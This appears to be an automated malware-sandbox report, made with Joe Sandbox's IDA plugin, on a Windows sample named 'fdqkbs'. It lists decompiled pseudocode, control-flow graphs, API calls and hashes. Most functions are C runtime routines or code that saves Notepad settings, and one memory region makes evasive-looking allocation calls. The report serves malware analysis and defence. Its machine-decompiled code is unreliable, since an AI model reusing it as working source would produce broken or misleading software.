                                                                                  • Opcode Fuzzy Hash: 8f3263e8028bc76e635bdae56e131ecbfbf27d60d2d8a770a885cf73d947d5b9
                                                                                  • Instruction Fuzzy Hash: 51F03771410606EADB117F75C90675E7B70AF00379F20857BF414BA1D1CBBC45919A19
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 484 40c55d-40c567 485 40c584-40c58d 484->485 486 40c569-40c573 484->486 488 40c590-40c595 485->488 489 40c58f 485->489 486->485 487 40c575-40c583 call 40370a 486->487 491 40c597-40c5a8 RtlAllocateHeap 488->491 492 40c5aa-40c5b1 488->492 489->488 491->492 493 40c5dc-40c5de 491->493 494 40c5b3-40c5bc call 40b343 492->494 495 40c5cf-40c5d4 492->495 494->488 500 40c5be-40c5c3 494->500 495->493 498 40c5d6 495->498 498->493 501 40c5c5 500->501 502 40c5cb-40c5cd 500->502 501->502 502->493
                                                                                  C-Code - Quality: 86%
                                                                                  			E0040C55D(signed int _a4, signed int _a8, long _a12) {
                                                                                  				void* _t10;
                                                                                  				long _t11;
                                                                                  				long _t12;
                                                                                  				signed int _t13;
                                                                                  				signed int _t17;
                                                                                  				long _t19;
                                                                                  				long _t24;
                                                                                  
                                                                                  				_t17 = _a4;
                                                                                  				if(_t17 == 0) {
                                                                                  					L3:
                                                                                  					_t24 = _t17 * _a8;
                                                                                  					__eflags = _t24;
                                                                                  					if(_t24 == 0) {
                                                                                  						_t24 = _t24 + 1;
                                                                                  						__eflags = _t24;
                                                                                  					}
                                                                                  					goto L5;
                                                                                  					L6:
                                                                                  					_t10 = RtlAllocateHeap( *0x415a64, 8, _t24); // executed
                                                                                  					__eflags = 0;
                                                                                  					if(0 == 0) {
                                                                                  						goto L7;
                                                                                  					}
                                                                                  					L14:
                                                                                  					return _t10;
                                                                                  					goto L15;
                                                                                  					L7:
                                                                                  					__eflags =  *0x415f58;
                                                                                  					if( *0x415f58 == 0) {
                                                                                  						_t19 = _a12;
                                                                                  						__eflags = _t19;
                                                                                  						if(_t19 != 0) {
                                                                                  							 *_t19 = 0xc;
                                                                                  						}
                                                                                  					} else {
                                                                                  						_t11 = E0040B343(_t10, _t24);
                                                                                  						__eflags = _t11;
                                                                                  						if(_t11 != 0) {
                                                                                  							L5:
                                                                                  							_t10 = 0;
                                                                                  							__eflags = _t24 - 0xffffffe0;
                                                                                  							if(_t24 > 0xffffffe0) {
                                                                                  								goto L7;
                                                                                  							} else {
                                                                                  								goto L6;
                                                                                  							}
                                                                                  						} else {
                                                                                  							_t12 = _a12;
                                                                                  							__eflags = _t12;
                                                                                  							if(_t12 != 0) {
                                                                                  								 *_t12 = 0xc;
                                                                                  							}
                                                                                  							_t10 = 0;
                                                                                  						}
                                                                                  					}
                                                                                  					goto L14;
                                                                                  				} else {
                                                                                  					_t13 = 0xffffffe0;
                                                                                  					_t27 = _t13 / _t17 - _a8;
                                                                                  					if(_t13 / _t17 >= _a8) {
                                                                                  						goto L3;
                                                                                  					} else {
                                                                                  						 *((intOrPtr*)(E0040370A(_t27))) = 0xc;
                                                                                  						return 0;
                                                                                  					}
                                                                                  				}
                                                                                  				L15:
                                                                                  			}










                                                                                  0x0040c562
                                                                                  0x0040c567
                                                                                  0x0040c584
                                                                                  0x0040c589
                                                                                  0x0040c58b
                                                                                  0x0040c58d
                                                                                  0x0040c58f
                                                                                  0x0040c58f
                                                                                  0x0040c58f
                                                                                  0x00000000
                                                                                  0x0040c597
                                                                                  0x0040c5a0
                                                                                  0x0040c5a6
                                                                                  0x0040c5a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040c5dc
                                                                                  0x0040c5de
                                                                                  0x00000000
                                                                                  0x0040c5aa
                                                                                  0x0040c5aa
                                                                                  0x0040c5b1
                                                                                  0x0040c5cf
                                                                                  0x0040c5d2
                                                                                  0x0040c5d4
                                                                                  0x0040c5d6
                                                                                  0x0040c5d6
                                                                                  0x0040c5b3
                                                                                  0x0040c5b4
                                                                                  0x0040c5ba
                                                                                  0x0040c5bc
                                                                                  0x0040c590
                                                                                  0x0040c590
                                                                                  0x0040c592
                                                                                  0x0040c595
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040c5be
                                                                                  0x0040c5be
                                                                                  0x0040c5c1
                                                                                  0x0040c5c3
                                                                                  0x0040c5c5
                                                                                  0x0040c5c5
                                                                                  0x0040c5cb
                                                                                  0x0040c5cb
                                                                                  0x0040c5bc
                                                                                  0x00000000
                                                                                  0x0040c569
                                                                                  0x0040c56d
                                                                                  0x0040c570
                                                                                  0x0040c573
                                                                                  0x00000000
                                                                                  0x0040c575
                                                                                  0x0040c57a
                                                                                  0x0040c583
                                                                                  0x0040c583
                                                                                  0x0040c573
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000008,004029D6,00000000,?,00408C55,00000000,004029D6,00000000,00000000,00000000,?,0040725B,00000001,00000214,?,004033DA), ref: 0040C5A0
                                                                                    • Part of subcall function 0040370A: __getptd_noexit.LIBCMT ref: 0040370A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 328603210-0
                                                                                  • Opcode ID: c35acac04d4de571c3b900101eba404759f094f7bb0d36237bb97e882affdf1c
                                                                                  • Instruction ID: 3453bd4832c175796419321ec01136e88b743f7a930f2e637f01305e36202e16
                                                                                  • Opcode Fuzzy Hash: c35acac04d4de571c3b900101eba404759f094f7bb0d36237bb97e882affdf1c
                                                                                  • Instruction Fuzzy Hash: 88019239201225EEEB249F65DC94BA73795AB85360F108B3AE815AB2D0DB38E901C658
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00480EBF: GetSystemInfo.KERNELBASE(?), ref: 00480EDC
                                                                                  • VirtualAllocExNuma.KERNELBASE(00000000), ref: 00480F82
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocInfoNumaSystemVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 449148690-0
                                                                                  • Opcode ID: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
                                                                                  • Instruction ID: 0e86de2588e11a1b15a8184666640b049d590f591f7b243c56cd6dfd8b8fec84
                                                                                  • Opcode Fuzzy Hash: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
                                                                                  • Instruction Fuzzy Hash: CFF0F470D64309BAEBB07BF2580776D76689F01309F108D5AB744762C3DABD9608476D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 536 40318f-4031a5 call 4030d1
                                                                                  C-Code - Quality: 25%
                                                                                  			E0040318F(intOrPtr _a4, intOrPtr _a8) {
                                                                                  				void* __ebp;
                                                                                  				void* _t3;
                                                                                  				void* _t4;
                                                                                  				void* _t5;
                                                                                  				void* _t6;
                                                                                  				void* _t9;
                                                                                  
                                                                                  				_push(0x40);
                                                                                  				_push(_a8);
                                                                                  				_push(_a4);
                                                                                  				_t3 = E004030D1(_t4, _t5, _t6, _t9); // executed
                                                                                  				return _t3;
                                                                                  			}









                                                                                  0x00403194
                                                                                  0x00403196
                                                                                  0x00403199
                                                                                  0x0040319c
                                                                                  0x004031a5

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wfsopen
                                                                                  • String ID:
                                                                                  • API String ID: 197181222-0
                                                                                  • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                  • Instruction ID: 2ced2bfb3f9d4ac77b3096636764d60d89a48be8f4a51fc1c3532829defdef63
                                                                                  • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                  • Instruction Fuzzy Hash: 26C0927254020C77DF112E83EC02E4A3F5E9BC0774F448021FB1C291A5AA77EAA19689
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlEncodePointer.NTDLL(00000000,0040B4CB,00415220,00000314,00000000,?,?,?,?,?,00406B3A,00415220,Microsoft Visual C++ Runtime Library,00012010), ref: 004070FB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: EncodePointer
                                                                                  • String ID:
                                                                                  • API String ID: 2118026453-0
                                                                                  • Opcode ID: 4880c20d65b4e0c8c680dfcee244b8a26e30051ea0af9c1fdfdc0c01e56bd82f
                                                                                  • Instruction ID: 45c9fe6625449defc2d77b84375a10b8a7ee1ea61be3005a2c3dbae11cbcc7d8
                                                                                  • Opcode Fuzzy Hash: 4880c20d65b4e0c8c680dfcee244b8a26e30051ea0af9c1fdfdc0c01e56bd82f
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00480E5C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
                                                                                  • Instruction ID: bcd0f4e5bf464c75245518bed374840f1af04c07023b6741f5c7002380603ca9
                                                                                  • Opcode Fuzzy Hash: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
                                                                                  • Instruction Fuzzy Hash: A0113A70D10208EFDB40EBA8DC4ABAEBBB4AB05304F208896E550B7251D3754A44CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 85%
                                                                                  			E0040800D(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                  				intOrPtr _v0;
                                                                                  				void* _v804;
                                                                                  				intOrPtr _v808;
                                                                                  				intOrPtr _v812;
                                                                                  				intOrPtr _t6;
                                                                                  				intOrPtr _t11;
                                                                                  				intOrPtr _t12;
                                                                                  				intOrPtr _t13;
                                                                                  				long _t17;
                                                                                  				intOrPtr _t21;
                                                                                  				intOrPtr _t22;
                                                                                  				intOrPtr _t25;
                                                                                  				intOrPtr _t26;
                                                                                  				intOrPtr _t27;
                                                                                  				intOrPtr* _t31;
                                                                                  				void* _t34;
                                                                                  
                                                                                  				_t27 = __esi;
                                                                                  				_t26 = __edi;
                                                                                  				_t25 = __edx;
                                                                                  				_t22 = __ecx;
                                                                                  				_t21 = __ebx;
                                                                                  				_t6 = __eax;
                                                                                  				_t34 = _t22 -  *0x414570; // 0x158f8049
                                                                                  				if(_t34 == 0) {
                                                                                  					asm("repe ret");
                                                                                  				}
                                                                                  				 *0x415d28 = _t6;
                                                                                  				 *0x415d24 = _t22;
                                                                                  				 *0x415d20 = _t25;
                                                                                  				 *0x415d1c = _t21;
                                                                                  				 *0x415d18 = _t27;
                                                                                  				 *0x415d14 = _t26;
                                                                                  				 *0x415d40 = ss;
                                                                                  				 *0x415d34 = cs;
                                                                                  				 *0x415d10 = ds;
                                                                                  				 *0x415d0c = es;
                                                                                  				 *0x415d08 = fs;
                                                                                  				 *0x415d04 = gs;
                                                                                  				asm("pushfd");
                                                                                  				_pop( *0x415d38);
                                                                                  				 *0x415d2c =  *_t31;
                                                                                  				 *0x415d30 = _v0;
                                                                                  				 *0x415d3c =  &_a4;
                                                                                  				 *0x415c78 = 0x10001;
                                                                                  				_t11 =  *0x415d30; // 0x0
                                                                                  				 *0x415c2c = _t11;
                                                                                  				 *0x415c20 = 0xc0000409;
                                                                                  				 *0x415c24 = 1;
                                                                                  				_t12 =  *0x414570; // 0x158f8049
                                                                                  				_v812 = _t12;
                                                                                  				_t13 =  *0x414574; // 0xea707fb6
                                                                                  				_v808 = _t13;
                                                                                  				 *0x415c70 = IsDebuggerPresent();
                                                                                  				_push(1);
                                                                                  				E00408005(_t14);
                                                                                  				SetUnhandledExceptionFilter(0);
                                                                                  				_t17 = UnhandledExceptionFilter(" \\A");
                                                                                  				if( *0x415c70 == 0) {
                                                                                  					_push(1);
                                                                                  					E00408005(_t17);
                                                                                  				}
                                                                                  				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                  			}



















                                                                                  0x0040800d
                                                                                  0x0040800d
                                                                                  0x0040800d
                                                                                  0x0040800d
                                                                                  0x0040800d
                                                                                  0x0040800d
                                                                                  0x0040800d
                                                                                  0x00408013
                                                                                  0x00408015
                                                                                  0x00408015
                                                                                  0x0040b896
                                                                                  0x0040b89b
                                                                                  0x0040b8a1
                                                                                  0x0040b8a7
                                                                                  0x0040b8ad
                                                                                  0x0040b8b3
                                                                                  0x0040b8b9
                                                                                  0x0040b8c0
                                                                                  0x0040b8c7
                                                                                  0x0040b8ce
                                                                                  0x0040b8d5
                                                                                  0x0040b8dc
                                                                                  0x0040b8e3
                                                                                  0x0040b8e4
                                                                                  0x0040b8ed
                                                                                  0x0040b8f5
                                                                                  0x0040b8fd
                                                                                  0x0040b908
                                                                                  0x0040b912
                                                                                  0x0040b917
                                                                                  0x0040b91c
                                                                                  0x0040b926
                                                                                  0x0040b930
                                                                                  0x0040b935
                                                                                  0x0040b93b
                                                                                  0x0040b940
                                                                                  0x0040b94c
                                                                                  0x0040b951
                                                                                  0x0040b953
                                                                                  0x0040b95b
                                                                                  0x0040b966
                                                                                  0x0040b973
                                                                                  0x0040b975
                                                                                  0x0040b977
                                                                                  0x0040b97c
                                                                                  0x0040b990

                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0040B946
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040B95B
                                                                                  • UnhandledExceptionFilter.KERNEL32( \A), ref: 0040B966
                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0040B982
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 0040B989
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                  • String ID: \A
                                                                                  • API String ID: 2579439406-3503946924
                                                                                  • Opcode ID: 6a3e57fa7c72d397f773aac9d32601290c33fa956e244bc9e11b990348b6f039
                                                                                  • Instruction ID: 85da8a808e4b98403950fcee6e72ddd3236f317be0e167dc40347674819b260b
                                                                                  • Opcode Fuzzy Hash: 6a3e57fa7c72d397f773aac9d32601290c33fa956e244bc9e11b990348b6f039
                                                                                  • Instruction Fuzzy Hash: 5B219EB8811B04EBD740DF65FD896C43BB4BB88315F50C53AE9099A260EBB959818F8D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004066DE() {
                                                                                  
                                                                                  				SetUnhandledExceptionFilter(E0040669C);
                                                                                  				return 0;
                                                                                  			}



                                                                                  0x004066e3
                                                                                  0x004066eb

                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000669C), ref: 004066E3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: bded30a880d91434e9ea7b6cf477416163f9988ffaad514a95d85cac01b9da64
                                                                                  • Instruction ID: 84f951258dbbba53fa59dbd9b439672c707fbbd9d41bbe323b106ac1153b7929
                                                                                  • Opcode Fuzzy Hash: bded30a880d91434e9ea7b6cf477416163f9988ffaad514a95d85cac01b9da64
                                                                                  • Instruction Fuzzy Hash: 5B9002A425114456C6101B715D1954965946A49712B528871A442DC094DABB50509A29
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                  • Instruction ID: 2766dd5a029832b7d37e3fb9707a1deac6e2cbf9e2181f6b93dfe521557bb84f
                                                                                  • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                  • Instruction Fuzzy Hash: CF11C236620119AFC7A0FF69C8849AEB7E9EF147A47048416FC54CB310E339ED85C758
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                  • Instruction ID: 52925d0b358a7acd3f541616a416249af7f279ebcd0f59705efdf9c39566a97c
                                                                                  • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                  • Instruction Fuzzy Hash: 5EE09A35264148EFCB80DBA8CC85D29B3F8EB09330B144691F825C73A0E739EE00DB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                  • Instruction ID: 8591dccd857a49fd4573a6170e8979aa6d8bf850ad78c6707efc41181d889be7
                                                                                  • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                  • Instruction Fuzzy Hash: DBE048322206149BC7A1AB59C844D5BF7E8EF44770B454826ED4597611C335FC05C794
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                  • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                                  • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                  • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 91%
                                                                                  			E004011CB(signed int __edx) {
                                                                                  				void* _v8;
                                                                                  				char _v12;
                                                                                  				char _v16;
                                                                                  				int _v20;
                                                                                  				void* _v36;
                                                                                  				struct _WINDOWPLACEMENT _v64;
                                                                                  				long _t78;
                                                                                  				char _t81;
                                                                                  				char _t84;
                                                                                  				char _t87;
                                                                                  				intOrPtr _t90;
                                                                                  				intOrPtr _t94;
                                                                                  				char _t104;
                                                                                  				char _t110;
                                                                                  				char _t128;
                                                                                  				char _t143;
                                                                                  				int _t146;
                                                                                  				signed int _t147;
                                                                                  				signed int _t164;
                                                                                  				int _t167;
                                                                                  
                                                                                  				_t164 = __edx;
                                                                                  				_t78 = RegCreateKeyExW(0x80000001, L"Software\\Microsoft\\Notepad", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v20);
                                                                                  				if(_t78 == 0) {
                                                                                  					_v64.length = 0x2c;
                                                                                  					GetWindowPlacement( *0x415f64,  &_v64);
                                                                                  					_t81 =  *0x415fdc; // 0x0
                                                                                  					asm("movsd");
                                                                                  					asm("movsd");
                                                                                  					asm("movsd");
                                                                                  					asm("movsd");
                                                                                  					_t167 = 4;
                                                                                  					_v12 = _t81;
                                                                                  					RegSetValueExW(_v8, L"fWrap", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_t84 =  *0x4151c4; // 0x0
                                                                                  					_v12 = _t84;
                                                                                  					RegSetValueExW(_v8, L"iWindowPosX", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_t87 =  *0x4151c8; // 0x0
                                                                                  					_v12 = _t87;
                                                                                  					RegSetValueExW(_v8, L"iWindowPosY", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_t90 =  *0x4151cc; // 0x0
                                                                                  					_v12 = _t90 -  *0x4151c4;
                                                                                  					RegSetValueExW(_v8, L"iWindowPosDX", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_t94 =  *0x4151d0; // 0x0
                                                                                  					_v12 = _t94 -  *0x4151c8;
                                                                                  					RegSetValueExW(_v8, L"iWindowPosDY", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_v12 =  *0x415f97 & 0x000000ff;
                                                                                  					RegSetValueExW(_v8, L"lfCharSet", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_v12 =  *0x415f99 & 0x000000ff;
                                                                                  					RegSetValueExW(_v8, L"lfClipPrecision", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_t104 =  *0x415f88; // 0x0
                                                                                  					_v12 = _t104;
                                                                                  					RegSetValueExW(_v8, L"lfEscapement", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_v12 =  *0x415f94 & 0x000000ff;
                                                                                  					RegSetValueExW(_v8, L"lfItalic", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_t110 =  *0x415f8c; // 0x0
                                                                                  					_v12 = _t110;
                                                                                  					RegSetValueExW(_v8, L"lfOrientation", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_v12 =  *0x415f98 & 0x000000ff;
                                                                                  					RegSetValueExW(_v8, L"lfOutPrecision", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_v12 =  *0x415f9b & 0x000000ff;
                                                                                  					RegSetValueExW(_v8, L"lfPitchAndFamily", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_v12 =  *0x415f9a & 0x000000ff;
                                                                                  					RegSetValueExW(_v8, L"lfQuality", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_v12 =  *0x415f96 & 0x000000ff;
                                                                                  					RegSetValueExW(_v8, L"lfStrikeOut", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_v12 =  *0x415f95 & 0x000000ff;
                                                                                  					RegSetValueExW(_v8, L"lfUnderline", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_t128 =  *0x415f90; // 0x0
                                                                                  					_v12 = _t128;
                                                                                  					RegSetValueExW(_v8, L"lfWeight", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_v12 =  *0x416cd0;
                                                                                  					RegSetValueExW(_v8, L"iMarginTop", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_v12 =  *0x416cd4;
                                                                                  					RegSetValueExW(_v8, L"iMarginBottom", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_v12 =  *0x416cd8;
                                                                                  					RegSetValueExW(_v8, L"iMarginLeft", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_v12 =  *0x416cdc;
                                                                                  					RegSetValueExW(_v8, L"iMarginRight", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_t143 =  *0x415f78; // 0x0
                                                                                  					_v12 = _t143;
                                                                                  					RegSetValueExW(_v8, L"bStatusBar", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                  					_t146 = E00401051();
                                                                                  					_t147 =  *0x415f80; // 0x0
                                                                                  					asm("cdq");
                                                                                  					_v16 = MulDiv((_t147 ^ _t164) - _t164, 0x2d0, _t146);
                                                                                  					RegSetValueExW(_v8, L"iPointSize", 0, _t167,  &_v16, 0x4151c4);
                                                                                  					RegSetValueExW(_v8, L"lfFaceName", 0, 1, 0x415f9c, lstrlenW(0x415f9c) + _t153);
                                                                                  					RegSetValueExW(_v8, L"szHeader", 0, 1, 0x416ce0, lstrlenW(0x416ce0) + _t156);
                                                                                  					RegSetValueExW(_v8, L"szTrailer", 0, 1, 0x416ee8, lstrlenW(0x416ee8) + _t159);
                                                                                  					return RegCloseKey(_v8);
                                                                                  				}
                                                                                  				return _t78;
                                                                                  			}























                                                                                  0x004011cb
                                                                                  0x004011ef
                                                                                  0x004011f7
                                                                                  0x00401209
                                                                                  0x00401210
                                                                                  0x00401216
                                                                                  0x00401223
                                                                                  0x00401224
                                                                                  0x00401225
                                                                                  0x00401228
                                                                                  0x0040122f
                                                                                  0x00401231
                                                                                  0x00401242
                                                                                  0x00401244
                                                                                  0x0040124a
                                                                                  0x0040125b
                                                                                  0x0040125d
                                                                                  0x00401263
                                                                                  0x00401274
                                                                                  0x00401276
                                                                                  0x00401282
                                                                                  0x00401293
                                                                                  0x00401295
                                                                                  0x004012a1
                                                                                  0x004012b2
                                                                                  0x004012bc
                                                                                  0x004012cd
                                                                                  0x004012d6
